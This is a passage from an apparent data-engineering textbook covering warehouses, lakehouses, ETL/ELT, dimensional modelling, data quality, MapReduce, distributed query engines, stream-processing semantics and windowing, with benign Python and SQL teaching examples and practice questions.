do not fight: a raw/bronze layer holding source data exactly as ingested
(never edited, so any downstream bug is replayable), a staging/silver layer
with types cast, keys deduplicated, and columns renamed to a standard, and a
marts/gold layer of business-facing tables shaped for the questions people
actually ask. Cost follows bytes scanned, so the operating discipline is
partitioning by time, pre-aggregating anything queried repeatedly, and setting
per-query byte limits so one careless SELECT * cannot spend a month's budget
(13.4).
Key Takeaways
- A warehouse's main product is agreement on definitions, not storage.
- Separating storage from compute lets workloads scale and be billed independently over a single copy of the data.
- Performance comes from skipping data — partition pruning, min/max file statistics, clustering — not from row-level indexes.
- Layer the warehouse raw -> staging -> marts, and keep raw immutable so any downstream mistake is replayable.
- Bytes scanned is the cost unit: always filter partitions and project columns.
🧪 Practice
- Rewrite a
SELECT *query against a large table so it prunes partitions and projects only needed columns; estimate the bytes saved.- Design the three-layer structure for one source system, naming the tables at each layer and the transformation between them.
- Interview: Why do cloud warehouses separate storage from compute, and what problem does that create that a coupled system did not have? (Hint: think about what now crosses the network on every query, and which caching layer has to compensate.)
Data Lakes and Lakehouses
A warehouse wants structure up front. That is a poor fit for data whose shape is unknown, whose volume is enormous relative to its value per byte, or that is not tabular at all — clickstream JSON, application logs, images, audio, model checkpoints. A data lake answers this by storing files of any format in object storage under an agreed directory layout, applying schema when the data is read rather than when it is written (schema-on-read). Storage is cheap, ingestion is trivial, and nothing is discarded merely because no table exists for it yet.
The failure mode has a name: the data swamp. Without a catalog nobody knows what exists; without schema enforcement a producer changes a field type and downstream jobs break silently; without transactions a reader can observe a half-written set of files; and correcting one record means rewriting a whole partition, which makes deletion requests (11.4) painful. Lakes accumulated data faster than they accumulated trust.
The lakehouse is the response: keep open columnar files in object storage, but put a transaction log over them. Open table formats — Delta Lake, Apache Iceberg, Apache Hudi — maintain an ordered log of metadata commits describing which files constitute the table at each version. That log buys ACID snapshots, schema evolution, row-level updates and deletes, and time travel, without giving up open formats or multi-engine access.
LAKEHOUSE TABLE = DATA FILES + A COMMIT LOG
object-store://sales/
data/ part-0001.parquet part-0002.parquet part-0003.parquet part-0004.parquet
_log/
0000.json -> ADD part-0001, part-0002 (version 1)
0001.json -> ADD part-0003 (version 2)
0002.json -> REMOVE part-0002, ADD part-0004 (version 3 = an UPDATE)
A reader at version 3 sees {0001, 0003, 0004}. A reader that started at version
2 keeps seeing {0001, 0002, 0003} — a consistent snapshot, unaffected by the
concurrent rewrite. Nothing is mutated in place; only the log moves forward.
# Row-level deletes over immutable files: the two write modes a table format
# offers, and the trade-off that decides between them.
def copy_on_write(files: dict[str, list[int]], to_delete: set[int]):
"""Rewrite each affected file without the deleted rows.
Slow writes, fastest reads — readers open only current data files."""
out = {}
for name, rows in files.items():
kept = [r for r in rows if r not in to_delete]
if len(kept) != len(rows):
out[name + "-v2"] = kept # whole file rewritten
else:
out[name] = rows # untouched: no cost
return out
def merge_on_read(files: dict[str, list[int]], to_delete: set[int]):
"""Write a small delete marker instead.
Fast writes, slower reads — every reader subtracts markers until
compaction folds them into the data files."""
return files, {"delete_markers": sorted(to_delete)}
files = {"part-0001": [1, 2, 3], "part-0002": [4, 5, 6]}
print(copy_on_write(files, {5})) # part-0002 rewritten as part-0002-v2
print(merge_on_read(files, {5})) # data untouched; marker file added
# Copy-on-write for read-heavy tables with occasional corrections;
# merge-on-read for streaming upserts where write latency dominates.
| Property | Data lake (raw files) | Warehouse | Lakehouse |
|---|---|---|---|
| Storage format | Any | Proprietary | Open columnar |
| Schema | On read | On write | On write, evolvable |
| Transactions | None | Yes | Yes (log-based) |
| Row-level updates | Rewrite partition | Native | Native |
| Engine lock-in | None | High | Low |
| Time travel | Manual snapshots | Limited retention | Native, by version |
| Cost per TB | Lowest | Highest | Low |
| Governance maturity | Weakest | Strongest | Improving |
For most organizations the answer is not one of the three but a boundary: raw and semi-structured data lands in lakehouse tables, curated high-concurrency business marts may live in a warehouse, and one catalog describes both so a query planner and a permission system can see the whole estate.
Key Takeaways
- A lake stores anything cheaply with schema-on-read; without a catalog and contracts it degrades into a swamp nobody trusts.
- A lakehouse adds a transaction log over open columnar files, giving ACID snapshots, schema evolution, row-level writes, and time travel.
- Copy-on-write favours read speed; merge-on-read favours write speed and depends on compaction to keep reads fast.
- Open formats keep multiple engines usable over one copy of the data.
- Time travel is what makes "reproduce yesterday's number" possible.
🧪 Practice
- Sketch the directory and log layout for a table receiving daily appends plus weekly corrections, and state which write mode you would choose.
- List three governance controls that stop a lake becoming a swamp, and name an owner for each.
- Interview: A GDPR request requires deleting one user's rows from a 50 TB lake table. How do you do it efficiently? (Hint: think about what makes those rows findable without a full scan, and which write mode avoids rewriting every file that user ever appeared in.)
ETL vs. ELT Pipelines
Data rarely arrives in the shape analysis needs, so every platform runs three steps: extract from sources, transform into conformed types and business definitions, and load into the analytical store. The interesting question is the order of the last two, and that order follows directly from what compute costs.
ETL transforms before loading, in a dedicated processing tier. It was the default when warehouse compute was scarce and bought by the year: you did the heavy lifting on cheaper machines and loaded only the finished result. The cost is that the warehouse never sees raw data, so a transformation bug requires re-extracting from the source — and the source may no longer hold it.
ELT loads raw data first and transforms inside the warehouse with SQL. It became the default once cloud compute turned elastic and per-second billed, and its advantages compound: the raw layer is preserved so transformations can be replayed and fixed without touching sources, transformations are SQL that analysts can read and review, and one engine runs both the pipeline and the queries, so there is a single system to scale and monitor.
ETL ELT
source source
| extract | extract
v v
[ processing tier ] [ warehouse: RAW layer ] <- immutable
| transform (Spark/Python) | transform (SQL, in-warehouse)
v v
[ warehouse ] <- final data only [ STAGING ] -> [ MARTS ]
Bug found? Re-extract from source. Bug found? Re-run SQL over raw.
The source may have rotated the data. Minutes, no source involvement.
ETL still wins in specific cases: when data must be masked or tokenized before it may legally enter the warehouse (11.4), when the transformation is not expressible in SQL (image decoding, model inference), or when volume must be reduced before crossing an expensive network boundary.
Orthogonal to the ordering is the load pattern. A full refresh recomputes the whole table — simple, and fine until the table is large. Incremental loading processes only new or changed rows, and needs a watermark column plus idempotent writes, because pipelines get retried.
from datetime import datetime, timedelta, timezone
def incremental_window(last_watermark: datetime, now: datetime,
lateness: timedelta = timedelta(hours=2)):
"""Re-read a safety overlap so late-arriving records are not skipped.
The overlap is only safe because the write below is idempotent."""
return last_watermark - lateness, now
lo, hi = incremental_window(
datetime(2026, 8, 30, 12, tzinfo=timezone.utc),
datetime(2026, 8, 31, 12, tzinfo=timezone.utc))
print(f"""
MERGE INTO marts.orders AS t
USING (
SELECT * FROM raw.orders
WHERE updated_at >= '{lo:%Y-%m-%d %H:%M}' -- overlap absorbs late arrivals
AND updated_at < '{hi:%Y-%m-%d %H:%M}' -- exclusive bound: no gaps, no
) AS s -- double-counting at the seam
ON t.order_id = s.order_id
WHEN MATCHED THEN UPDATE SET * -- re-running changes nothing
WHEN NOT MATCHED THEN INSERT *; -- => the job is safe to retry
""")
Whichever ordering you choose, pipelines must be idempotent and
replayable. Idempotent means running the same job twice leaves the same
table — achieved with MERGE on a natural key, or by deleting and rewriting a
whole partition rather than appending. Replayable means any output can be rebuilt
from inputs you still hold, which is precisely why the raw layer is never edited.
| Aspect | ETL | ELT |
|---|---|---|
| Transform location | Separate processing tier | Inside the warehouse |
| Raw data retained | Usually not | Yes, by design |
| Language | Python/Scala/Spark | SQL (plus dbt-style tooling) |
| Fixing a logic bug | Re-extract from source | Re-run SQL over raw |
| Best when | Masking, non-SQL work | Elastic warehouse compute |
| Governance | Sensitive data never lands | Raw data must be protected |
Key Takeaways
- ELT loads raw first and transforms in-warehouse; ETL transforms first and is chosen for masking, volume reduction, or non-SQL work.
- An immutable raw layer makes transformation bugs replayable without touching source systems.
- Incremental loads need a watermark plus a lateness overlap, and that overlap is only safe if writes are idempotent.
MERGEon a natural key, or whole-partition rewrite, makes retries harmless.- ELT moves sensitive data into the warehouse, raising the governance bar.
🧪 Practice
- Convert a full-refresh job into an incremental one: choose the watermark column, the overlap, and the idempotent write strategy.
- Identify a pipeline you know that is not idempotent, and describe exactly what a mid-run retry would corrupt.
- Interview: A nightly pipeline failed halfway and was restarted; some rows are now duplicated. What design would have prevented it? (Hint: think about what makes a write's result depend only on the input, not on how many times it ran.)
Data Modeling for Analytics
Transactional schemas are normalized to avoid update anomalies: each fact lives in exactly one place, so a change touches one row. That is right when writes dominate. Analytical schemas optimize for the opposite verb, and their enemy is not redundancy but the join. "Revenue by product category by region by month" against a fully normalized schema may require eight joins, each of which the engine must plan, shuffle, and materialize.
The dominant analytical pattern is the star schema: one central fact table holding measurements at a declared grain (one row per order line, one row per page view) surrounded by dimension tables holding descriptive attributes (product, customer, date, store). Facts are numeric, additive, and enormous; dimensions are textual, small, and used for filtering and grouping. Every query becomes one fact table plus a few single-hop dimension joins — a shape engines optimize aggressively with broadcast joins, since dimensions fit in memory.
STAR SCHEMA
dim_date dim_customer
+------------+ +----------------+
| date_key PK| | customer_key PK|
| day, week | | name, segment |
| month, qtr | | country, tier |
+-----+------+ +--------+-------+
| |
| fact_order_line |
| +---------------------+ |
+---->| date_key FK |<--+
| customer_key FK |
+---->| product_key FK |
| | store_key FK |<--+
| |---------------------| |
| | quantity MEASURE| | GRAIN: one row per order line.
| | net_amount MEASURE| | Write it down first; every
| | discount MEASURE| | measure must be true at it.
| +---------------------+ |
dim_product dim_store
Declaring the grain first is the single most important modelling decision. If
one row is one order line, net_amount is additive but order_shipping_fee is
not — summing it across lines multiplies the fee by the number of lines. Hence
the standard classification of measures: additive (summable across every
dimension), semi-additive (summable across some, e.g. an account balance across
accounts but not across time), and non-additive (ratios and percentages, which
must be recomputed from their components rather than averaged).
Dimensions change over time, and how you handle that determines whether history stays honest. A customer moves from "SMB" to "Enterprise": do last year's orders now report as Enterprise revenue? Slowly changing dimension types answer this — Type 1 overwrites (history is rewritten), Type 2 inserts a new version row with validity dates and keeps the old one (history preserved), Type 3 keeps a "previous value" column.
-- Type 2 SCD: one row per version, with a surrogate key so each fact points at
-- the version that was current when the fact occurred.
CREATE TABLE dim_customer (
customer_key BIGINT, -- surrogate PK: unique per VERSION
customer_id STRING, -- natural key: stable across versions
segment STRING,
valid_from TIMESTAMP,
valid_to TIMESTAMP, -- NULL (or 9999-12-31) for the current row
is_current BOOLEAN
);
-- 5001 C-42 SMB 2024-01-01 -> 2026-03-15 is_current = false
-- 7310 C-42 Enterprise 2026-03-15 -> NULL is_current = true
--
-- A 2025 order stores customer_key 5001, so it still reports as SMB revenue.
-- Joining on customer_id instead would silently restate all of history.
SELECT d.segment, SUM(f.net_amount) AS revenue
FROM fact_order_line f
JOIN dim_customer d ON f.customer_key = d.customer_key -- version-accurate
JOIN dim_date t ON f.date_key = t.date_key
WHERE t.year = 2025
GROUP BY d.segment;
A snowflake schema normalizes dimensions further (product -> category -> department as separate tables), saving storage at the cost of extra joins; it is rarely worth it now that storage is cheap. Wide denormalized tables go the other way — one flat table with dimensions pre-joined — and are common in columnar engines where repeated strings compress to almost nothing; they trade storage and update cost for zero-join queries. Choose by how often dimensions change and how many tools consume the table.
Key Takeaways
- Analytical modelling optimizes reads; the cost to minimize is joins, not redundancy.
- A star schema is one large fact table at a declared grain plus small dimensions joined one hop away.
- Declare the grain before anything else; every measure must be valid at it.
- Classify measures as additive, semi-additive, or non-additive — averaging a ratio is a classic silent error.
- Type 2 dimensions preserve history; joining on the natural key instead of the version key silently restates the past.
🧪 Practice
- Model a star schema for an e-commerce checkout: declare the grain, list the fact measures, and name four dimensions.
- Take a metric you know and classify each input as additive, semi-additive, or non-additive; show which one breaks under summing.
- Interview: A customer's country changes. Should past orders report under the old or the new country? (Hint: there is no universal answer — ask who consumes the report and whether they need history as it was, or as it is.)
Data Quality and Lineage
A dashboard that is down is a nuisance; a dashboard that is confidently wrong is a liability, because decisions get made from it. Analytical systems fail silently by default: a source adds a column, a currency changes units, a job skips a partition — and the query still returns a number. Data quality engineering is the practice of making those failures loud.
The mechanism is assertions that run inside the pipeline, not reports generated after it. Checks fall into recognisable families: freshness (was this table updated within its expected interval?), volume (is today's row count within a plausible band of recent days?), schema (have columns or types changed?), uniqueness and referential integrity (are keys unique, do foreign keys resolve?), and distribution (has the null rate or the mean moved beyond a threshold?).
QUALITY GATE INSIDE THE PIPELINE
extract --> load raw --> transform --> [ CHECKS ] --+-- pass --> publish
| | (swap the
| +-- fail --> pointer to
| the new
block publication, snapshot)
page the owner,
leave consumers on
yesterday's good data
The key property: consumers never see a bad table, because publication is a
metadata swap that happens only after checks pass. For nearly every analytical
consumer, stale-but-correct beats fresh-but-wrong.
from dataclasses import dataclass
from typing import Callable
@dataclass
class Check:
name: str
sql: str
severity: str # "error" blocks publication; "warn" only alerts
CHECKS = [
Check("freshness", """
SELECT DATEDIFF('hour', MAX(updated_at), CURRENT_TIMESTAMP()) > 26
FROM staging.orders""", "error"), # daily job + 2h grace
Check("row_volume", """
SELECT ABS(COUNT(*) - (SELECT AVG(cnt) FROM daily_counts))
> 4 * (SELECT STDDEV(cnt) FROM daily_counts)
FROM staging.orders WHERE load_date = CURRENT_DATE()""", "error"),
Check("unique_key", """
SELECT COUNT(*) > 0 FROM (
SELECT order_id FROM staging.orders
GROUP BY order_id HAVING COUNT(*) > 1)""", "error"),
Check("fk_resolves", """
SELECT COUNT(*) > 0 FROM staging.orders o
LEFT JOIN dim_customer c ON o.customer_key = c.customer_key
WHERE c.customer_key IS NULL""", "error"),
Check("null_rate", """
SELECT AVG(CASE WHEN country IS NULL THEN 1 ELSE 0 END) > 0.02
FROM staging.orders""", "warn"), # drift, not corruption
]
def run_gate(checks: list[Check], execute: Callable[[str], bool]) -> bool:
blocking: list[str] = []
for c in checks:
if execute(c.sql): # the SQL returns True on FAILURE
print(f"[{c.severity.upper()}] {c.name}")
if c.severity == "error":
blocking.append(c.name)
if blocking:
print(f"publication blocked by: {', '.join(blocking)}")
return not blocking
Lineage is the other half: a graph recording which datasets, columns, and jobs produced each output. Its value appears at exactly two moments. When a number looks wrong, lineage answers "what feeds this?" and turns a day of archaeology into a two-minute traversal. When a source is about to change, it answers the reverse — "what breaks if I drop this column?" — which is the difference between a planned migration and an outage. Column-level lineage captured by parsing the SQL, rather than maintained by hand, is what makes impact analysis precise instead of alarmist.
Around both sit data contracts: explicit, versioned agreements between a producing service and its consumers covering schema, semantics, freshness, and the process for breaking changes. Contracts move the fix upstream — the producer is prevented from shipping an incompatible change — instead of leaving every downstream team to detect breakage independently. Pair them with ownership: every important table needs a named owner, an SLA, and an on-call path (12.2), or the checks simply page a channel nobody reads.
Key Takeaways
- Analytical systems fail silently; quality checks exist to make wrong data loud rather than plausible.
- Run checks as a publication gate inside the pipeline — stale-but-correct beats fresh-but-wrong.
- Cover freshness, volume, schema, uniqueness, referential integrity, and distribution; separate blocking errors from warnings.
- Lineage answers both "what feeds this number?" and "what breaks if I change this?" — derive it from SQL parsing, not from documentation.
- Data contracts push the fix upstream to the producer; ownership and SLAs make the alerts actionable.
🧪 Practice
- Write freshness, volume, and uniqueness checks for a table you know, including thresholds and the reasoning behind them.
- Draw the lineage graph for one dashboard metric back to its sources, and mark which upstream change would break it.
- Interview: A key metric dropped 30% overnight. How do you decide whether it is a real change or a data bug? (Hint: think about what else would have moved if it were real, and which pipeline signals distinguish "fewer events" from "fewer events ingested".)
<a id="142-batch-and-stream-processing"></a>
14.2 Batch and Stream Processing
Storing data is the easy half; computing over it at scale is where the distributed-systems problems return. This subchapter covers the execution model that made large-scale batch processing tractable, the query engines that generalized it, the delivery and state semantics that make streaming results trustworthy, the windowing and watermark machinery that gives unbounded data a notion of "done", and the two architectures that combine batch and streaming.
MapReduce Model
Processing a petabyte on one machine is impossible, and hand-writing a distributed program for every analysis is impractical — you would rewrite partitioning, scheduling, retries, and machine failure handling each time. MapReduce's insight was that a large fraction of data processing fits one skeleton, so the framework can own all the hard distributed parts and let the user supply two ordinary functions.
The skeleton has three phases. Map runs a function over each input record independently, emitting key-value pairs — this is embarrassingly parallel, one task per input split, scheduled near the data so bytes do not cross the network. Shuffle groups every emitted pair by key, moving records across the network so that all values for a key land on one machine. Reduce runs a function over each key's grouped values, emitting the final output.
The analogy is counting votes nationally. Each polling station tallies its own ballots (map), tallies are routed by candidate to that candidate's national desk (shuffle), and each desk sums its pile (reduce). No station needs to see the whole country, and if one station's count is lost you re-run only that station.
MAPREDUCE: WORD COUNT
input splits MAP (parallel) SHUFFLE REDUCE
+-----------+ +-------------------+ by key, over +------------------+
| "a b a" |-->| (a,1)(b,1)(a,1) |-\ the network | a: [1,1,1] -> 3 |
+-----------+ +-------------------+ \--------------->+------------------+
| "b c" |-->| (b,1)(c,1) |-----------------> | b: [1,1,1] -> 3 |
+-----------+ +-------------------+ +------------------+
| "a b" |-->| (a,1)(b,1) |-----------------> | c: [1] -> 1 |
+-----------+ +-------------------+ +------------------+
The SHUFFLE is the expensive phase: it is all-to-all network traffic plus a
disk sort. Every serious optimisation is about shuffling less.
from collections import defaultdict
from typing import Iterator
def map_fn(line: str) -> Iterator[tuple[str, int]]:
for word in line.split():
yield word, 1
def combine_fn(key: str, values: list[int]) -> tuple[str, int]:
"""A COMBINER is a reducer run locally on the mapper's output before the
shuffle. Valid only when the reduce is commutative and associative (sum,
max, count), and it can cut shuffle bytes by orders of magnitude."""
return key, sum(values)
def reduce_fn(key: str, values: list[int]) -> tuple[str, int]:
return key, sum(values)
def run(splits: list[list[str]], use_combiner: bool = True):
shuffled: dict[str, list[int]] = defaultdict(list)
shuffle_records = 0
for split in splits: # each split = one map task
local: dict[str, list[int]] = defaultdict(list)
for line in split:
for k, v in map_fn(line):
local[k].append(v)
emitted = ([combine_fn(k, vs) for k, vs in local.items()]
if use_combiner
else [(k, v) for k, vs in local.items() for v in vs])
shuffle_records += len(emitted)
for k, v in emitted:
shuffled[k].append(v) # this crosses the network
result = dict(reduce_fn(k, vs) for k, vs in shuffled.items())
return result, shuffle_records
data = [["a b a", "b c"], ["a b", "c c c"]]
print(run(data, use_combiner=True)) # ({'a': 3, 'b': 3, 'c': 4}, 6 records)
print(run(data, use_combiner=False)) # ({'a': 3, 'b': 3, 'c': 4}, 10 records)
Two properties made the model durable. Fault tolerance is cheap because map and reduce tasks are deterministic and side-effect-free: a failed task is simply re-run on another machine, and at cluster scale machines fail constantly. Scalability is horizontal: more input means more map tasks, and the framework schedules them without user involvement.
Its limitations drove everything that followed. Every stage materializes to disk, so multi-stage jobs — and especially the iterative algorithms common in machine learning — pay repeated write-read cycles. The API is also restrictive: real analysis is a DAG of operations, not one map and one reduce, so users chained jobs by hand. Spark and similar engines generalize the model to a DAG with in-memory intermediate data and lineage-based recovery (recompute a lost partition from its parents rather than replicating it), and Flink extends the DAG to unbounded input. The mental model still matters: map is parallel and cheap, shuffle is the expensive part, and reduce is where skew hurts — one key holding 40% of the data ("hot key" skew) means one reducer runs long after every other has finished, which is the most common cause of a job that is 95% done for an hour.
Key Takeaways
- MapReduce lets the framework own partitioning, scheduling, and failure recovery while users supply two pure functions.
- Map is parallel and local; shuffle is all-to-all network plus sort; reduce aggregates per key.
- Combiners cut shuffle volume dramatically, but only for commutative and associative reductions.
- Fault tolerance comes from deterministic, side-effect-free tasks that can be re-run anywhere.
- Key skew is the classic performance failure: one hot key serializes the job.
- Modern engines keep the model but generalize to in-memory DAGs.
🧪 Practice
- Express "count distinct users per country per day" as map, combine, and reduce functions.
- Explain why computing a median is harder in this model than computing a sum, and give a workable approach.
- Interview: A job is stuck at 99% for an hour with one task running. What is happening and how would you fix it? (Hint: think about how records are assigned to reducers, and what you can do to a key whose share of the data is enormous.)
Distributed Query Engines
Writing map and reduce functions by hand is the assembly language of data processing. Distributed query engines — Spark SQL, Trino/Presto, Flink SQL, BigQuery, ClickHouse — let you write declarative SQL over data spread across hundreds of machines and take responsibility for turning it into an efficient distributed plan. The value is that the engine can rewrite your query, whereas it cannot rewrite your Python.
Execution proceeds through a pipeline. The parser produces a logical plan; the optimizer rewrites it using both rules (push filters toward the scan, prune unused columns, collapse projections) and cost-based decisions informed by statistics (which table is small enough to broadcast, which join order minimizes intermediate rows); the scheduler splits the physical plan into stages separated by shuffles and dispatches tasks to workers.
QUERY -> PLAN -> STAGES
SELECT c.country, SUM(o.amount)
FROM orders o JOIN customers c USING (customer_id)
WHERE o.order_date >= '2026-08-01'
GROUP BY c.country;
LOGICAL OPTIMIZED PHYSICAL STAGES
+-----------+ +-----------+ stage 1: scan orders
| aggregate | | aggregate | (filter + project
+-----+-----+ +-----+-----+ pushed into scan)
| | stage 2: scan customers
+-----+-----+ +-----+-----+ (small -> broadcast)
| join | | join | stage 3: hash join +
+--+-----+--+ +--+-----+--+ partial aggregate
| | | | --- shuffle by country
+--+-+ +-+---+ +----+-+ +-+-----+ stage 4: final aggregate
|scan| |scan | |scan | |scan |
|ord | |cust | |+filt | |+proj | <- FILTER PUSHDOWN: the single
+----+ +-----+ |+proj | +-------+ biggest win, because it
(filter applied late) +------+ shrinks data before shuffle
Join strategy is where an engine earns its keep. A broadcast (map-side) join ships the small side to every worker and needs no shuffle of the large side — the fastest option when one side fits in memory. A shuffle hash join repartitions both sides by the join key so matching rows meet on the same worker. A sort-merge join sorts both sides and streams them together, which handles data larger than memory. Choosing wrongly — broadcasting a table that is not small, or shuffling one that is — is the most common cause of a query that runs for an hour instead of a minute.
def choose_join(left_rows: int, left_bytes: int,
right_rows: int, right_bytes: int,
broadcast_limit_bytes: int = 10_000_000,
workers: int = 100) -> str:
small, small_bytes = ((("right"), right_bytes) if right_bytes <= left_bytes
else (("left"), left_bytes))
if small_bytes <= broadcast_limit_bytes:
# Cost: replicate small side to every worker; large side never moves.
cost = small_bytes * workers
return f"broadcast {small} side (~{cost/1e6:.0f} MB network total)"
# Otherwise both sides must be repartitioned by the join key.
cost = left_bytes + right_bytes
return f"shuffle hash join (~{cost/1e9:.1f} GB shuffled)"
print(choose_join(2_000_000_000, 800_000_000_000, 50_000, 4_000_000))
# broadcast right side (~400 MB network total)
print(choose_join(2_000_000_000, 800_000_000_000, 900_000_000, 300_000_000_000))
# shuffle hash join (~1100.0 GB shuffled)
Two operational realities matter more than plan theory. First, statistics decay: a cost-based optimizer with stale table statistics makes confident bad choices, which is why modern engines add adaptive execution — re-planning mid-query once actual partition sizes are known. Second, skew defeats the optimizer's uniformity assumption; the standard remedy is salting, appending a random suffix to the hot key so its rows spread across many partitions, then aggregating twice.
-- Salting a skewed join key: split the hot key across 32 partitions.
WITH salted_facts AS (
SELECT *, CONCAT(customer_id, '#',
CAST(FLOOR(RAND() * 32) AS STRING)) AS salted_key
FROM fact_events -- one customer holds 40% of rows
),
salted_dim AS (
SELECT d.*, CONCAT(d.customer_id, '#', CAST(n AS STRING)) AS salted_key
FROM dim_customer d
CROSS JOIN UNNEST(GENERATE_ARRAY(0, 31)) AS n -- replicate the small side
)
SELECT f.event_type, COUNT(*) -- join now spreads evenly
FROM salted_facts f JOIN salted_dim d USING (salted_key)
GROUP BY f.event_type;
Engines also differ in intent. Trino and similar MPP engines are tuned for interactive queries across federated sources; Spark is tuned for large batch pipelines with heavy transformation; ClickHouse and Druid are tuned for low-latency aggregation over pre-shaped data. Picking the engine whose design point matches the workload matters more than tuning the wrong one.
Key Takeaways
- Declarative SQL lets the engine rewrite the plan; imperative code prevents it.
- Filter and projection pushdown before any shuffle is the largest single win.
- Broadcast joins avoid shuffling the large side but only work when one side genuinely fits in memory; otherwise shuffle hash or sort-merge.
- Cost-based optimizers depend on fresh statistics; adaptive execution re-plans using observed sizes.
- Skew breaks uniformity assumptions — salt hot keys and aggregate twice.
- Match the engine to the workload: interactive, batch, or low-latency aggregation.
🧪 Practice
- Take a slow query you know, read its plan, and identify the stage that moves the most data.
- Given a 900 GB fact table and a 6 MB dimension, state the join strategy and the network cost under each alternative.
- Interview: A join is slow because one key dominates. Describe two fixes. (Hint: one changes the key distribution, the other avoids the shuffle entirely by making the other side small enough to copy.)
Stream Processing Semantics
Batch processing has a comfortable property: the input is finite, so a job can finish and be re-run to correct a mistake. Streams are unbounded, so there is no "finished" and no clean re-run — the system must produce continuously correct results while machines fail underneath it. That forces you to be explicit about two questions people usually conflate: how many times can a record be delivered, and how many times can it affect the result.
Delivery guarantees are the transport-level answer. At-most-once acknowledges before processing: fast, and records vanish on crash. At-least-once acknowledges after processing: nothing is lost, but a crash between processing and acknowledgement causes reprocessing, so duplicates are guaranteed to occur eventually. Exactly-once is impossible as a delivery guarantee across an unreliable network — the acknowledgement itself can be lost — so what real systems provide is exactly-once processing semantics: records may be delivered many times, but their effect on state and output is applied once.
WHERE DUPLICATES COME FROM
source ---(1) read---> [ processor: update state ] ---(2) write---> sink
^ | |
| (3) commit offset |
+---- crash between (2) and (3): the record is re-read and its ----+
effect is applied a SECOND time, unless (2) and (3) commit
atomically or the sink write is idempotent.
Exactly-once is achieved in one of two ways. The first is a transactional commit: state updates, output writes, and the source offset advance atomically, so a crash rolls back to a consistent point — Flink's checkpoint barriers with a two-phase sink commit, or Kafka Streams' transactional producer, work this way. The second, usually cheaper, is an idempotent sink: write with a deterministic key so applying the same record twice leaves the same result. If the sink is idempotent, at-least-once delivery already gives you effectively-once results, and this is the pragmatic choice in most production systems.
class ExactlyOnceProcessor:
"""Effectively-once via an idempotent sink plus a dedupe window.
The dedupe set bounds duplicates from retries; the sink upsert makes even
a missed dedupe harmless."""
def __init__(self, sink, window_size: int = 100_000):
self.sink = sink
self.seen: dict[str, int] = {} # event_id -> offset, bounded
self.window_size = window_size
def process(self, record) -> bool:
if record.event_id in self.seen:
return False # duplicate from a retry: drop
result = transform(record)
# Deterministic key => replaying this write changes nothing.
self.sink.upsert(key=record.event_id, value=result)
self.seen[record.event_id] = record.offset
if len(self.seen) > self.window_size:
# Evict the oldest half; duplicates older than the window are
# still absorbed by the upsert, just less cheaply.
cutoff = sorted(self.seen.values())[len(self.seen) // 2]
self.seen = {k: v for k, v in self.seen.items() if v >= cutoff}
return True
def transform(record):
return {"user": record.user_id, "value": record.value * 2}
The other pillar is state. A stateless map is easy to recover — just re-read. A stateful operator (running counts, session tracking, joins across streams) holds data that must survive failure, so streaming engines keep operator state in an embedded store (often RocksDB) and periodically checkpoint it to durable storage. Recovery restores the last checkpoint and rewinds the source to the offset recorded in it. This is why the source must be replayable: a log like Kafka or Kinesis works, a plain HTTP push does not.
| Guarantee | Records lost? | Duplicates? | Cost |
|---|---|---|---|
| At-most-once | Possible | No | Lowest latency, no bookkeeping |
| At-least-once | No | Yes | Cheap; needs idempotent sinks |
| Exactly-once | No | No effect | Transactions + checkpoints; |
| higher latency and complexity |
Key Takeaways
- Separate delivery guarantees from processing effects: exactly-once delivery is impossible, exactly-once effect is not.
- At-least-once plus an idempotent sink is the practical default and is far cheaper than distributed transactions.
- True exactly-once needs state, output, and offset to commit atomically.
- Stateful operators need periodic checkpoints plus a replayable source; without replay there is no recovery.
- Checkpoint interval trades recovery time against steady-state overhead.
🧪 Practice
- For a stream job you know, identify the sink and state whether it is idempotent; if not, design a key that would make it so.
- Trace what happens on a crash between writing output and committing the offset, under each of the three guarantees.
- Interview: Your pipeline claims exactly-once but the downstream table shows duplicates. Where would you look? (Hint: the guarantee only spans the operators inside the engine — think about what happens at the boundary where data leaves it.)
Windowing Strategies
Aggregation needs a finite set of rows, but a stream never ends — "the average order value" over an infinite stream is not a computable quantity. Windowing solves this by slicing the unbounded stream into bounded chunks that can be closed and emitted. Choosing the window shape is a modelling decision about what question you are asking, not a tuning knob.
Tumbling windows are fixed-size and non-overlapping: every event belongs to exactly one window. They are the right choice for periodic reporting ("orders per minute") because the results partition the timeline cleanly and sum correctly.
Sliding (hopping) windows are fixed-size but advance by a smaller step, so windows overlap and each event lands in several. They answer "at any moment, what was the total over the last 5 minutes?" — the natural shape for alerting, because a tumbling window can split a burst across a boundary and miss the threshold. Cost scales with the overlap factor: a 5-minute window advancing every 30 seconds puts every event in 10 windows.
Session windows have no fixed size. They group events separated by less than a gap of inactivity, so the window length is defined by the data. This is the model for user behaviour: a session ends when someone stops interacting, not when a clock ticks over.
events: a b c d e f g h i
time: ---1---3--------8-9----13-----------22-23-24------31--->
TUMBLING (size 10) [0-------10)[10------20)[20------30)[30---
contents a b c d e f g h i
SLIDING (size 10, hop 5) [0------10)
[5-------15)
[10-------20)
[15------25) <- f,g,h counted in
[20------30) several windows
SESSION (gap 4) [a b] [c d e] [f g h] [i]
1..3 gap 5 -> close 8..13 gap 9 -> close 22..24 31
Window length is decided by the data, not by the clock.
from dataclasses import dataclass, field
@dataclass
class Event:
key: str
ts: int # event time, seconds
def tumbling(events: list[Event], size: int) -> dict[int, list[Event]]:
out: dict[int, list[Event]] = {}
for e in events:
start = (e.ts // size) * size # each event -> exactly 1 window
out.setdefault(start, []).append(e)
return out
def sliding(events: list[Event], size: int, hop: int) -> dict[int, list[Event]]:
out: dict[int, list[Event]] = {}
for e in events:
first = ((e.ts - size) // hop + 1) * hop # earliest window containing e
for start in range(max(first, 0), e.ts + 1, hop):
out.setdefault(start, []).append(e) # duplicated across overlaps
return out
def sessions(events: list[Event], gap: int) -> list[list[Event]]:
out: list[list[Event]] = []
for e in sorted(events, key=lambda x: x.ts):
if out and e.ts - out[-1][-1].ts <= gap:
out[-1].append(e) # extend the open session
else:
out.append([e]) # inactivity gap: start a new one
return out
evts = [Event("u", t) for t in (1, 3, 8, 9, 13, 22, 23, 24, 31)]
print(sorted(tumbling(evts, 10))) # [0, 10, 20, 30]
print({k: len(v) for k, v in sorted(sliding(evts, 10, 5).items())})
print([[e.ts for e in s] for s in sessions(evts, 4)])
# [[1, 3], [8, 9, 13], [22, 23, 24], [31]]
Two design points follow. Windows must be keyed — you almost always want "per
user" or "per device", not a global aggregate — and the number of open windows is
keys x windows per key, which is what actually determines memory. Session
windows are the most expensive because they can merge retroactively when a late
